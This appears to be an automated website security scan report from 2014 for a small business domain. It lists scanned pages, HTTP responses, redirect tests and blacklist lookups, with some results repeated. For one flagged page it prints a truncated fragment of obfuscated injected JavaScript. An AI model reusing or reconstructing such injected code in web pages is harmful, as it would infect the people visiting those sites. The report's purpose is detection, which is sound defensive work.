Scanned pages/files
Request | Server response | Status |
http://tlousolutions.co.za/ | HTTP/1.1 200 OK Connection: close Date: Sat, 04 Oct 2014 19:10:39 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.4.4-14+deb7u14 | clean |
http://www.tlousolutions.co.za/new/default.php | 200 OK Content-Length: 14460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $="Z63eZ3dZ220.chZ2561Z2572Z2543odeZ2541t(0Z2529Z255e(Z25270x00Z2527+esZ2529))Z253bZ257d}Z22;cuZ3dZ22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4Z3czub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dobuf4dZ7bdKazpqf4)4zaxxZ2fbuf4dZ7bdKwZ7bZ7bZ257F}qKzuyq4)46upbyuZ257FqfKZ257FZ7byud6Z2fbuf4dZ7bdK`}yqZ7ba`4)4#Z2526$Z2frazw`}Z7bz4dZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dobuf4}gKqzuvxqp4)4ruxgqZ2f}r4Z3c5c}zpZ7bc:Z7bdqfu42245zub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dfq`afz4}gKqzuvxqpZ2f}r4Z3c`mdqZ7br4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43g`f}zs3Z Antivirus reports:
| ||
http://www.tlousolutions.co.za/new/content/content_cataloguelist.php | 200 OK Content-Length: 1386 Content-Type: text/html | clean |
http://www.tlousolutions.co.za/new/content/ewp.js | 200 OK Content-Length: 27272 Content-Type: application/x-javascript | clean |
http://www.tlousolutions.co.za/test404page.js | 404 Not Found Content-Length: 281 Content-Type: text/html | clean |
http://tlousolutions.co.za/photos/ | 404 Not Found Content-Length: 274 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tlousolutions.co.za
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 19:10:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u14
GET / HTTP/1.1
Host: tlousolutions.co.za
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 19:10:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u14
Second query (visit from search engine):
GET / HTTP/1.1
Host: tlousolutions.co.za
Referer: http://www.google.com/search?q=tlousolutions.co.za
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tlousolutions.co.za
Referer: http://www.google.com/search?q=tlousolutions.co.za
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tlousolutions.co.za
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tlousolutions.co.za/
Result: tlousolutions.co.za is not infected or malware details are not published yet.
Result: tlousolutions.co.za is not infected or malware details are not published yet.